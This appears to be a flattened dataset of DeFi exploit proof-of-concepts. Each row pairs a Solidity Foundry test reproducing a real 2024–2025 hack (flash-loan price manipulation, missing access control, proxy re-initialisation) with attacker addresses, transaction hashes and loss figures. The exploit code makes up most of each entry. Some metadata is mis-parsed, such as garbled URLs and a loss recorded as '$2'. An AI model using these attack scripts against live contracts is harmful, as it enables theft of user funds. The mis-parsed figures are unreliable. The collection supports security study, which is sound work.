source_code
stringlengths
878
31.2k
type
stringclasses
1 value
protocol
stringlengths
2
33
date
stringclasses
70 values
file_name
stringlengths
10
41
attack_vector
stringclasses
4 values
content_hash
stringlengths
16
16
collected_at
stringdate
2026-01-07 10:59:16
2026-01-07 10:59:16
_source
stringclasses
1 value
chain
stringclasses
8 values
block_number
int64
1.11M
356M
total_lost_raw
stringlengths
3
127
total_lost_usd
float64
0
19,026B
attacker_address
stringlengths
65
82
attack_contract
stringlengths
70
89
vulnerable_contract
stringlengths
68
82
attack_tx
stringlengths
89
115
postmortem_url
stringclasses
85 values
twitter_url
stringlengths
48
62
has_keyinfo
bool
2 classes
has_analysis
bool
2 classes
has_attack_vector
bool
2 classes
severity
stringclasses
4 values
severity_raw
stringlengths
3
127
category
stringclasses
5 values
exploit_code
stringlengths
0
25.5k
has_exploit_code
bool
2 classes
keyinfo_total_lost
stringlengths
0
127
keyinfo_attacker
stringlengths
0
82
keyinfo_attack_contract
stringlengths
0
89
keyinfo_vulnerable_contract
stringlengths
0
82
keyinfo_attack_tx
stringlengths
0
115
analysis_postmortem
stringclasses
82 values
analysis_twitter
stringlengths
0
62
funds_lost_formatted
stringlengths
2
13
content_richness_score
float64
0.63
10
quality_estimate
stringclasses
3 values
title
stringlengths
20
51
has_total_lost
bool
2 classes
has_vulnerable_contract
bool
2 classes
has_attack_tx
bool
2 classes
has_postmortem
bool
2 classes
import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ≈135k // Attacker : 0x3026C464d3Bd6Ef0CeD0D49e80f171b58176Ce32 // Attack Contract : https://bscscan.com/address/0x61dd07ce0cecf0d7bacf5eb208c57d16bbdee168 // Vulnerable Contract : https://bscscan.com/address/0xb000f121A173D7Dd638bb080fE...
exploit_poc
Z123
2024-04
Z123_exp.sol
null
822471b73a0cfb7c
2026-01-07T10:59:16.527008
postmortems
bsc
38,077,210
≈135k
135,000
null
https://bscscan.com/address/0x61dd07ce0cecf0d7bacf5eb208c57d16bbdee168
https://bscscan.com/address/0xb000f121A173D7Dd638bb080fEe669a2F3Af9760
https://bscscan.com/tx/0xc0c4e99a76da80a4cf43d3110364840151226c0a197c1728bb60dc3f1b3a6a27
null
null
true
true
false
high
≈135k
unknown
function testExploit() public { emit log_named_decimal_uint("befor ack usdc balance = ", bsc_usd_.balanceOf(address(this)), bsc_usd_.decimals()); pancakeV3_.flash(address(this), 18_000_000 ether, 0, ""); emit log_named_decimal_uint( "after profit usdc balance = ", bsc_usd_.balanceOf(...
true
≈135k
https://bscscan.com/address/0x61dd07ce0cecf0d7bacf5eb208c57d16bbdee168
https://bscscan.com/address/0xb000f121A173D7Dd638bb080fEe669a2F3Af9760
https://bscscan.com/tx/0xc0c4e99a76da80a4cf43d3110364840151226c0a197c1728bb60dc3f1b3a6a27
$135.0K
7.35
medium
Z123 Exploit (2024-04)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~999M US$ // Attacker : 0xBEF24B94C205999ea17d2ae4941cE849C9114bfd // Attack Contract : 0x9C63d6328C8e989c99b8e01DE6825e998778B103 // Vulnerable Contract : 0xFd80a436dA2F4...
exploit_poc
SATX
2024-04
SATX_exp.sol
null
e008fd57970a2cd7
2026-01-07T10:59:16.527062
postmortems
bsc
37,914,434
~999M US$
999,000,000
null
null
null
https://bscscan.com/tx/0x7e02ee7242a672fb84458d12198fae4122d7029ba64f3673e7800d811a8de93f
null
null
true
false
false
critical
~999M US$
unknown
function testExploit() public { deal(attacker, 0.900000001 ether); WBNB.deposit{value: 0.9 ether}(); approveAll(); address[] memory path = new address[](2); path[0] = address(WBNB); path[1] = address(SATX); router.swapExactTokensForTokensSupportingFeeOnTransferTok...
true
~999M US$
https://bscscan.com/tx/0x7e02ee7242a672fb84458d12198fae4122d7029ba64f3673e7800d811a8de93f
$999.00M
6.81
medium
SATX Exploit (2024-04)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.17; import "forge-std/Test.sol"; import "../interface.sol"; // Total Lost: >$100k // Attacker: 0x306174b707ebf6d7301a0bcd898ae1666ec176ae // Attack Contract: 0x797acb321cb10154aa807fcd1e155c34135483cd // Attack Contract: 0x797acb321cb10154aa807fcd1e155c34135...
exploit_poc
MARS
2024-04
MARS_exp.sol
flash_loan
bd7e4ce842b5e36b
2026-01-07T10:59:16.527107
postmortems
unknown
37,903,299
>$100k
100,000
null
null
null
https://app.blocksec.com/explorer/tx/bsc/0x25e2af0a55581d5629a933af9fedd3c70e6d0c320f0b72700ca80e5cdd36c80b
null
null
false
false
true
high
>$100k
flash-loan
function testExploit_MARS() public { v3pair.flash(address(this), 0, lending_amount, ""); }
true
https://app.blocksec.com/explorer/tx/bsc/0x25e2af0a55581d5629a933af9fedd3c70e6d0c320f0b72700ca80e5cdd36c80b
$100.0K
8.14
high
MARS Exploit (2024-04)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 350K // Attacker : /address/https://basescan.org/address/0xbb344544ad328b5492397e967fe81737855e7e77 // Attack Contract : /address/https://basescan.org/address/0x13d27a2d...
exploit_poc
SumerMoney
2024-04
SumerMoney_exp.sol
flash_loan
9e3e094cc75906ba
2026-01-07T10:59:16.527158
postmortems
base
null
350K
350,000
null
null
null
null
null
null
true
true
true
high
350K
flash-loan
function testExploit() public { deal(address(this), 1); address[] memory tokens = new address[](2); tokens[0] = address(WETH); tokens[1] = address(USDC); uint256[] memory amounts = new uint256[](2); amounts[0] = 150 ether; amounts[1] = 645_000 * 1e6; bytes...
true
350K
$350.0K
7.75
medium
SumerMoney Exploit (2024-04)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/bsc/0xe15d6f7fa891c2626819209edf2d5ded6948310eaada067b400062aa022ce718 // GUY : https://x.com/ChainAegis/status/1779809931962827055 // Profit : ~14K US...
exploit_poc
GFA
2024-04
GFA_exp.sol
null
228061c3f3d9c4ab
2026-01-07T10:59:16.527216
postmortems
unknown
37,857,763
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { emit log_named_decimal_uint( "attacker balance BUSD before attack:", BUSD.balanceOf(address(this)), BUSD.decimals() ); attack(); emit log_named_decimal_uint( "attacker balance BUSD after attack:", BUSD.balanceOf(address(this)), BUSD...
true
Unknown
3.29
low
GFA Exploit (2024-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; // @KeyInfo - Total Lost : 1.4M // Attacker : https://etherscan.io/address/0x19066f7431df29a0910d287c8822936bb7d89e23 // Attack Contract : https://etherscan.io/address/0x1da4bc596bfb1087f2f7999b0340fcba03c47fbd // Vulnerable ...
exploit_poc
PikeFinance
2024-04
PikeFinance_exp.sol
null
d9f071c27a48eeb6
2026-01-07T10:59:16.527261
postmortems
ethereum
null
1.4M
1,400,000
https://etherscan.io/address/0x19066f7431df29a0910d287c8822936bb7d89e23
https://etherscan.io/address/0x1da4bc596bfb1087f2f7999b0340fcba03c47fbd
https://etherscan.io/address/0xfc7599cffea9de127a9f9c748ccb451a34d2f063
https://etherscan.io/tx/0xe2912b8bf34d561983f2ae95f34e33ecc7792a2905a3e317fcc98052bce66431
null
null
true
true
false
critical
1.4M
unknown
function testExploit() public { emit log_named_decimal_uint(" Attacker ETH Balance Before exploit", address(this).balance, 18); // Initialize proxy contract address _owner = address(this); address _WNativeAddress = address(this); address _uniswapHelperAddress = address(this); ...
true
1.4M
https://etherscan.io/address/0x19066f7431df29a0910d287c8822936bb7d89e23
https://etherscan.io/address/0x1da4bc596bfb1087f2f7999b0340fcba03c47fbd
https://etherscan.io/address/0xfc7599cffea9de127a9f9c748ccb451a34d2f063
https://etherscan.io/tx/0xe2912b8bf34d561983f2ae95f34e33ecc7792a2905a3e317fcc98052bce66431
$1.40M
7.28
medium
PikeFinance Exploit (2024-04)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/bsc/0xea181f730886ece947e255ab508f5af1d0f569fee3368b651d5dbb28549087b5 // Vulnearable Contract: 0x11cee747Faaf0C0801075253ac28aB503C888888 // GUY : htt...
exploit_poc
Hackathon
2024-04
Hackathon_exp.sol
flash_loan
9a0b945064be40ff
2026-01-07T10:59:16.527311
postmortems
unknown
37,854,043
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { emit log_named_decimal_uint( "attacker balance BUSD before attack:", BUSD.balanceOf(address(this)), BUSD.decimals() ); DPP.flashLoan(0, 200_000 ether, address(this), new bytes(1)); emit log_named_decimal_uint( "attacker balance BUSD...
true
Unknown
4.37
low
Hackathon Exploit (2024-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 2_517_438_179_912_631_607_253_979 WSM ≈ 18K // Attacker : 0x3026C464d3Bd6Ef0CeD0D49e80f171b58176Ce32 // Attack Contract : https://bscscan.com/address/0x014eE3c3dE6941cb0...
exploit_poc
WSM
2024-04
WSM_exp.sol
flash_loan
b9fcc15620cacfd9
2026-01-07T10:59:16.527373
postmortems
bsc
37,569,860
2_517_438_179_912_631_607_253_979 WSM ≈ 18K
2
null
https://bscscan.com/address/0x014eE3c3dE6941cb0202Dd2b30C89309e874B114
https://bscscan.com/address/0xc0afd0e40bb3dcaebd9451aa5c319b745bf792b4
https://bscscan.com/tx/0x5a475a73343519f899527fdb9850f68f8fc73168073c72a3cff8c0c7b8a1e520
null
null
true
true
true
low
2_517_438_179_912_631_607_253_979 WSM ≈ 18K
flash-loan
function testExploit() public { console.log("1. before attack wsh token balance of this = ", wshToken_.balanceOf(address(this))); BNB_WSH_10000.flash(address(this), 5_000_000 ether, 0, ""); console.log("8. after attack wsh token balance of this = ", wshToken_.balanceOf(address(this))); }
true
2_517_438_179_912_631_607_253_979 WSM ≈ 18K
https://bscscan.com/address/0x014eE3c3dE6941cb0202Dd2b30C89309e874B114
https://bscscan.com/address/0xc0afd0e40bb3dcaebd9451aa5c319b745bf792b4
https://bscscan.com/tx/0x5a475a73343519f899527fdb9850f68f8fc73168073c72a3cff8c0c7b8a1e520
$2
8.89
high
WSM Exploit (2024-04)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; // @KeyInfo - Total Lost: ~190K // Attacker: https://bscscan.com/address/0xd03d360dfc1dac7935e114d564a088077e6754a0 // Attack Contract: https://bscscan.com/address/0xc73781107d086754314f7720ca14ab8c5ad035e4 // Vulnerable Cont...
exploit_poc
NGFS
2024-04
NGFS_exp.sol
null
46473e7937c4c4ab
2026-01-07T10:59:16.527429
postmortems
bsc
null
~190K
190,000
https://bscscan.com/address/0xd03d360dfc1dac7935e114d564a088077e6754a0
https://bscscan.com/address/0xc73781107d086754314f7720ca14ab8c5ad035e4
https://bscscan.com/address/0xa608985f5b40cdf6862bec775207f84280a91e3a
https://bscscan.com/tx/0x8ff764dde572928c353716358e271638fa05af54be69f043df72ad9ad054de25
https://louistsai.vercel.app/p/2024-04-25-ngfs-exploit/
https://twitter.com/CertiKAlert/status/1783476515331616847
true
true
false
high
~190K
unknown
function testExploit() public { uint256 tokenBalanceBefore = IBEP20(USDT_TOKEN).balanceOf(address(this)); emit log_named_decimal_uint("Attacker USDT Balance Before exploit", tokenBalanceBefore, 18); address pair = IPancakeFactory(PANCAKE_FACTORY).getPair(NGFS_TOKEN, USDT_TOKEN); INGFSTo...
true
~190K
https://bscscan.com/address/0xd03d360dfc1dac7935e114d564a088077e6754a0
https://bscscan.com/address/0xc73781107d086754314f7720ca14ab8c5ad035e4
https://bscscan.com/address/0xa608985f5b40cdf6862bec775207f84280a91e3a
https://bscscan.com/tx/0x8ff764dde572928c353716358e271638fa05af54be69f043df72ad9ad054de25
https://louistsai.vercel.app/p/2024-04-25-ngfs-exploit/
https://twitter.com/CertiKAlert/status/1783476515331616847
$190.0K
7.67
medium
NGFS Exploit (2024-04)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~5 $ETH // Attacker : https://bscscan.com/address/0x123fa25c574bb3158ecf6515595932a92a1da510 // Attack Contract : https://bscscan.com/address/0xe6e06030b33593d140f224fc1cdd1b8ffe99e50a // Vulnerable Contract : https://bscscan.co...
exploit_poc
BNBX
2024-04
BNBX_exp.sol
null
734c11f50f1acc5a
2026-01-07T10:59:16.527479
postmortems
bsc
38,230,509
~5 $ETH
5
https://bscscan.com/address/0x123fa25c574bb3158ecf6515595932a92a1da510
https://bscscan.com/address/0xe6e06030b33593d140f224fc1cdd1b8ffe99e50a
https://bscscan.com/address/0x389a9ae29fbe53cca7bc8b7a4d9d0a04078e1c24
https://bscscan.com/tx/0xea88dc6dbd81d09c572b5849e0d4508598edcf8f11c9a995cd8fe7e6c194f39e
null
null
true
false
false
low
~5 $ETH
unknown
function testExploit() public { emit log_named_uint("Attacker WBNB balance before attack", WBNB.balanceOf(address(this))); // 10 victims as an example address[] memory victims = new address[](10); victims[0] = 0xE71F1d71aFe531bCd9b89f82D8a44B04F73b7146; victims[1] = 0xe497e225407...
true
~5 $ETH
https://bscscan.com/address/0x123fa25c574bb3158ecf6515595932a92a1da510
https://bscscan.com/address/0xe6e06030b33593d140f224fc1cdd1b8ffe99e50a
https://bscscan.com/address/0x389a9ae29fbe53cca7bc8b7a4d9d0a04078e1c24
https://bscscan.com/tx/0xea88dc6dbd81d09c572b5849e0d4508598edcf8f11c9a995cd8fe7e6c194f39e
$5
7.62
medium
BNBX Exploit (2024-04)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 36K // Attacker : https://arbiscan.io/address/0xc91cb089084f0126458a1938b794aa73b9f9189d // Attack Contract : https://arbiscan.io/address/0x68d843d31de072390d41bff30b0076b...
exploit_poc
Rico
2024-04
Rico_exp.sol
null
91e171d0d885f409
2026-01-07T10:59:16.527532
postmortems
arbitrum
null
36K
36,000
https://arbiscan.io/address/0xc91cb089084f0126458a1938b794aa73b9f9189d
https://arbiscan.io/address/0x68d843d31de072390d41bff30b0076bef0482d8f
https://arbiscan.io/address/0x598c6c1cd9459f882530fc9d7da438cb74c6cb3b
https://arbiscan.io/tx/0x5d2a94785d95a740ec5f778e79ff014c880bcefec70d1a7c2440e611f84713d6
null
https://twitter.com/0xlouistsai/status/1781845191047164016
true
true
false
medium
36K
unknown
function testExploit() public { emit log_named_decimal_uint( "Attacker USDC Balance Before exploit", IERC20(USDC_TOKEN).balanceOf(address(this)), 6 ); // Transfer tokens from BankDiamond to the attacker transferTokens(USDC_TOKEN); transferTokens(ARB_TOKEN); t...
true
36K
https://arbiscan.io/address/0xc91cb089084f0126458a1938b794aa73b9f9189d
https://arbiscan.io/address/0x68d843d31de072390d41bff30b0076bef0482d8f
https://arbiscan.io/address/0x598c6c1cd9459f882530fc9d7da438cb74c6cb3b
https://arbiscan.io/tx/0x5d2a94785d95a740ec5f778e79ff014c880bcefec70d1a7c2440e611f84713d6
https://twitter.com/0xlouistsai/status/1781845191047164016
$36.0K
8.29
high
Rico Exploit (2024-04)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~5k $BUSD // Attacker : https://bscscan.com/address/0xc1b6f9898576d722dbf604aaa452cfea3a639c59 // Attack Contract : https://bscscan.com/address/0xb22cf0e1672344f23f3126fbd35f856e961fd780 // Vulnerable Contract : https://bscscan....
exploit_poc
BigBangSwap
2024-04
BigBangSwap_exp.sol
flash_loan
d45da9401aca34a5
2026-01-07T10:59:16.527582
postmortems
bsc
37,740,105
~5k $BUSD
5,000
https://bscscan.com/address/0xc1b6f9898576d722dbf604aaa452cfea3a639c59
https://bscscan.com/address/0xb22cf0e1672344f23f3126fbd35f856e961fd780
https://bscscan.com/address/0xa45d4359246dbd523ab690bef01da06b07450030
https://app.blocksec.com/explorer/tx/bsc/0x94055664287a565d4867a97ba6d5d2e28c55d10846e3f83355ba84bd1b9280fc
null
null
true
true
true
low
~5k $BUSD
flash-loan
function testExploit() public { BUSD.transfer(address(0x000000000000000000000000000000000000dEaD), BUSD.balanceOf(address(this))); BUSD.approve(address(Router), type(uint256).max); BGG.approve(address(TransparentUpgradeableProxy), type(uint256).max); emit log_named_uint("Attacker BUSD ...
true
~5k $BUSD
https://bscscan.com/address/0xc1b6f9898576d722dbf604aaa452cfea3a639c59
https://bscscan.com/address/0xb22cf0e1672344f23f3126fbd35f856e961fd780
https://bscscan.com/address/0xa45d4359246dbd523ab690bef01da06b07450030
https://app.blocksec.com/explorer/tx/bsc/0x94055664287a565d4867a97ba6d5d2e28c55d10846e3f83355ba84bd1b9280fc
$5.0K
9.42
high
BigBangSwap Exploit (2024-04)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/bsc/0x9fcf38d0af4dd08f4d60f7658b623e35664e74bca0eaebdb0c3b9a6965d6257b // GUY : https://twitter.com/bbbb/status/1777228277415039304 // Profit : ~87K ...
exploit_poc
SQUID
2024-04
SQUID_exp.sol
null
8f928f3c9cb56977
2026-01-07T10:59:16.527635
postmortems
unknown
37,672,969
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
1.73
low
SQUID Exploit (2024-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.20; import {Test, console2} from "forge-std/Test.sol"; import "./../interface.sol"; // TX 1:https://app.blocksec.com/explorer/tx/bsc/0x383dbb44a91687b2b9bbd8b6779957a198d114f24af662776f384569b84fc549 // TX 2: https://app.blocksec.com/explorer/tx/bsc/0x829394...
exploit_poc
GROKD
2024-04
GROKD_exp.sol
access_control
b42f83c24e4f54c0
2026-01-07T10:59:16.527694
postmortems
bsc
37,622,476
null
null
null
null
null
null
null
null
false
false
true
medium
null
access-control
false
Unknown
4
low
GROKD Exploit (2024-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; // @KeyInfo - Total Lost : ~200K // Attacker1 : https://bscscan.com/address/0x6eec0f4c017afe3dfadf32b51339c37e9fd59dfb // Attack Contract : https://bscscan.com/address/0x791c6542bc52efe4f20df0ee672b88579ae3fd9a // Vulnerable ...
exploit_poc
ChaingeFinance
2024-04
ChaingeFinance_exp.sol
null
0276d3c66b4a9e89
2026-01-07T10:59:16.527767
postmortems
bsc
null
~200K
200,000
null
https://bscscan.com/address/0x791c6542bc52efe4f20df0ee672b88579ae3fd9a
https://bscscan.com/address/0x80a0d7a6fd2a22982ce282933b384568e5c852bf
https://bscscan.com/tx/0xd348b5fc00b26fc1457b70d02f9cb5e5a66a564cc4eba2136a473866a47dac08
null
null
true
true
false
high
~200K
unknown
function testExploit() public { address[12] memory targetToken = [ address(usdt), address(sol), address(AVAX), address(babydoge), address(FOLKI), address(ATOM), address(TLOS), address(IOTX), address(linch...
true
~200K
https://bscscan.com/address/0x791c6542bc52efe4f20df0ee672b88579ae3fd9a
https://bscscan.com/address/0x80a0d7a6fd2a22982ce282933b384568e5c852bf
https://bscscan.com/tx/0xd348b5fc00b26fc1457b70d02f9cb5e5a66a564cc4eba2136a473866a47dac08
$200.0K
9
high
ChaingeFinance Exploit (2024-04)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~234K // Attacker : https://bscscan.com/address/0x5bb5b6d41c3e5e41d9b9ed33d12f1537a1293d5f // Vulnerable Contract : https://bscscan.com/address/0xf436f8fe7b26d87eb74e544...
exploit_poc
OpenLeverage2
2024-04
OpenLeverage2_exp.sol
null
3b8fc9d549e7c717
2026-01-07T10:59:16.527846
postmortems
bsc
37,470,328
~234K
234,000
https://bscscan.com/address/0x5bb5b6d41c3e5e41d9b9ed33d12f1537a1293d5f
null
https://bscscan.com/address/0xf436f8fe7b26d87eb74e5446acec2e8ad4075e47
null
null
null
true
true
false
high
~234K
unknown
function testExploit() public { // First TX deal(address(this), 5 ether); emit log_named_decimal_uint("Exploiter BNB balance before attack", address(this).balance, 18); USDC.approve(address(Router), type(uint256).max); BUSDT.approve(address(Router), type(uint256).max); ...
true
~234K
https://bscscan.com/address/0x5bb5b6d41c3e5e41d9b9ed33d12f1537a1293d5f
https://bscscan.com/address/0xf436f8fe7b26d87eb74e5446acec2e8ad4075e47
$234.0K
8
high
OpenLeverage2 Exploit (2024-04)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/eth/0x998f1da472d927e74405b0aa1bbf5c1dbc50d74b39977bed3307ea2ada1f1d3f // GUY : https://x.com/CyversAlerts/status/1780593407871635538 // Profit : ~18 W...
exploit_poc
UnverifiedContr_0x00C409
2024-04
UnverifiedContr_0x00C409_exp.sol
null
fd8c84e774e340a9
2026-01-07T10:59:16.527919
postmortems
unknown
19,255,512
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function attack() public { weth.withdraw(4704.1 ether); address(vulnContract).call{value: 4704.1 ether}(""); bytes memory data = abi.encodeWithSelector( bytes4(0xba381f8f), 0xffffffffffffffffff, 0x01, address(this), address(this), ...
true
Unknown
3.71
low
UnverifiedContr_0x00C409 Exploit (2024-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : 14.5k USD // Attacker : https://arbiscan.io/address/0x5fb0b8584b34e56e386941a65dbe455ad43c5a23 // Attack Contract : N/A // Vulnerable Contract : https://arbiscan.io/address/0xf9FF933f51bA180a474634440a...
exploit_poc
Stead
2025-06
Stead_exp.sol
access_control
271e87152bbff64b
2026-01-07T10:59:16.527965
postmortems
arbitrum
null
14.5k USD
14,500
https://arbiscan.io/address/0x5fb0b8584b34e56e386941a65dbe455ad43c5a23
null
https://arbiscan.io/address/0xf9FF933f51bA180a474634440a406c95DfB27596
https://arbiscan.io/tx/0x32dbfce2253002498cd41a2d79e249250f92673bc3de652f3919591ee26e8001
null
https://x.com/TenArmorAlert/status/1939508301596672036
true
true
true
medium
14.5k USD
access-control
function testExploit() public balanceLog { // The contract 0xf9ff lacks proper access control, allowing any to drain STEAD tokens from the contract. bytes4 selector = 0x16fb27ce; (bool success, ) = VICTIM.call(abi.encodePacked(selector, abi.encode(1, 1, 1))); require(success, "Call faile...
true
14.5k USD
https://arbiscan.io/address/0x5fb0b8584b34e56e386941a65dbe455ad43c5a23
https://arbiscan.io/address/0xf9FF933f51bA180a474634440a406c95DfB27596
https://arbiscan.io/tx/0x32dbfce2253002498cd41a2d79e249250f92673bc3de652f3919591ee26e8001
https://x.com/TenArmorAlert/status/1939508301596672036
$14.5K
7.71
medium
Stead Exploit (2025-06)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : 9.6M USD // Attacker : https://etherscan.io/address/0x6d9f6e900ac2ce6770fd9f04f98b7b0fc355e2ea // Attack Contract : https://etherscan.io/address/0xf90da523a7c19a0a3d8d4606242c46f1ee459dc7 // Vulnerable...
exploit_poc
ResupplyFi
2025-06
ResupplyFi_exp.sol
flash_loan
fc28f11991fc7643
2026-01-07T10:59:16.528005
postmortems
ethereum
null
9.6M USD
9,600,000
https://etherscan.io/address/0x6d9f6e900ac2ce6770fd9f04f98b7b0fc355e2ea
https://etherscan.io/address/0xf90da523a7c19a0a3d8d4606242c46f1ee459dc7
https://etherscan.io/address/0x6e90c85a495d54c6d7E1f3400FEF1f6e59f86bd6
https://etherscan.io/tx/0xffbbd492e0605a8bb6d490c3cd879e87ff60862b0684160d08fd5711e7a872d3
https://mirror.xyz/0x521CB9b35514E9c8a8a929C890bf1489F63B2C84/ygJ1kh6satW9l_NDBM47V87CfaQbn2q0tWy_rtp76OI
https://x.com/peckshield/status/1938061948647817647
true
true
true
critical
9.6M USD
flash-loan
function testExploit() public balanceLog { usdc.approve(address(morphoBlue), type(uint256).max); morphoBlue.flashLoan(address(usdc), flashLoanAmount, hex""); }
true
9.6M USD
https://etherscan.io/address/0x6d9f6e900ac2ce6770fd9f04f98b7b0fc355e2ea
https://etherscan.io/address/0xf90da523a7c19a0a3d8d4606242c46f1ee459dc7
https://etherscan.io/address/0x6e90c85a495d54c6d7E1f3400FEF1f6e59f86bd6
https://etherscan.io/tx/0xffbbd492e0605a8bb6d490c3cd879e87ff60862b0684160d08fd5711e7a872d3
https://mirror.xyz/0x521CB9b35514E9c8a8a929C890bf1489F63B2C84/ygJ1kh6satW9l_NDBM47V87CfaQbn2q0tWy_rtp76OI
https://x.com/peckshield/status/1938061948647817647
$9.60M
9.74
high
ResupplyFi Exploit (2025-06)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 25k USD // Attacker : https://etherscan.io/address/0x48f1d0f5831eb6e544f8cbde777b527b87a1be98 // Attack Contract : https://etherscan.io/address/0xff13d5899aa7d84c10e4cd6fb030...
exploit_poc
MetaPool
2025-06
MetaPool_exp.sol
flash_loan
ab7cf3bb982dff8c
2026-01-07T10:59:16.528059
postmortems
ethereum
null
25k USD
25,000
https://etherscan.io/address/0x48f1d0f5831eb6e544f8cbde777b527b87a1be98
https://etherscan.io/address/0xff13d5899aa7d84c10e4cd6fb030b80554424136
https://etherscan.io/address/0x48afbbd342f64ef8a9ab1c143719b63c2ad81710
https://etherscan.io/tx/0x57ee419a001d85085478d04dd2a73daa91175b1d7c11d8a8fb5622c56fd1fa69
https://www.coindesk.com/business/2025/06/17/liquid-staking-protocol-meta-pool-suffers-usd27m-exploit
https://x.com/peckshield/status/1934895187102454206
true
true
true
medium
25k USD
flash-loan
function testExploit() public balanceLog { //implement exploit code here MetaPoolExploit exploit = new MetaPoolExploit(); exploit.start(); uint256 amount = IMpEth(MPETH_ADDR).balanceOf(address(this)); console.log("Attacker mpETH balance After exploit: ", amount); } rece...
true
25k USD
https://etherscan.io/address/0x48f1d0f5831eb6e544f8cbde777b527b87a1be98
https://etherscan.io/address/0xff13d5899aa7d84c10e4cd6fb030b80554424136
https://etherscan.io/address/0x48afbbd342f64ef8a9ab1c143719b63c2ad81710
https://etherscan.io/tx/0x57ee419a001d85085478d04dd2a73daa91175b1d7c11d8a8fb5622c56fd1fa69
https://www.coindesk.com/business/2025/06/17/liquid-staking-protocol-meta-pool-suffers-usd27m-exploit
https://x.com/peckshield/status/1934895187102454206
$25.0K
9.7
high
MetaPool Exploit (2025-06)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 5k USD // Attacker : https://etherscan.io/address/0x1234567a98230550894bf93e2346a8bc5c3b36e3 // Attack Contract : https://etherscan.io/address/0xcb4059bb021f4cf9d90267b796112...
exploit_poc
GradientMakerPool
2025-06
GradientMakerPool_exp.sol
flash_loan
b2473b698681eb42
2026-01-07T10:59:16.528116
postmortems
ethereum
null
5k USD
5,000
https://etherscan.io/address/0x1234567a98230550894bf93e2346a8bc5c3b36e3
https://etherscan.io/address/0xcb4059bb021f4cf9d90267b7961125210cedb792
https://etherscan.io/address/0x37Ea5f691bCe8459C66fFceeb9cf34ffa32fdadC
https://etherscan.io/tx/0xb5cfa3f86ce9506e2364475dc43c44de444b079d4752edbffcdad7d1654b1f67
https://t.me/defimon_alerts/1340
null
true
true
true
low
5k USD
flash-loan
function testExploit() public balanceLog { //implement exploit code here morphoBlue.flashLoan(address(weth), BORROW_AMOUNT, ""); }
true
5k USD
https://etherscan.io/address/0x1234567a98230550894bf93e2346a8bc5c3b36e3
https://etherscan.io/address/0xcb4059bb021f4cf9d90267b7961125210cedb792
https://etherscan.io/address/0x37Ea5f691bCe8459C66fFceeb9cf34ffa32fdadC
https://etherscan.io/tx/0xb5cfa3f86ce9506e2364475dc43c44de444b079d4752edbffcdad7d1654b1f67
https://t.me/defimon_alerts/1340
$5.0K
9.01
high
GradientMakerPool Exploit (2025-06)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 24.5 WBNB // Attacker : https://bscscan.com/address/0x2dea406bb3bea68d6be8d9ef0071fdf63082fb52 // Attack Contract : https://bscscan.com/address/0xe63a5c681cacb8484c8a989cfd...
exploit_poc
BankrollNetwork
2025-06
BankrollNetwork_exp.sol
null
e8000c8f3cdcb811
2026-01-07T10:59:16.528172
postmortems
bsc
null
24.5 WBNB
24.5
https://bscscan.com/address/0x2dea406bb3bea68d6be8d9ef0071fdf63082fb52
https://bscscan.com/address/0xe63a5c681cacb8484c8a989cfdd41b8e3b7a2be2
https://bscscan.com/address/0xAdEfb902CaB716B8043c5231ae9A50b8b4eE7c4e
https://bscscan.com/tx/0x7226b3947c7e8651982e5bd777bca52d03ea31d19b515dec123595a4435ae22c
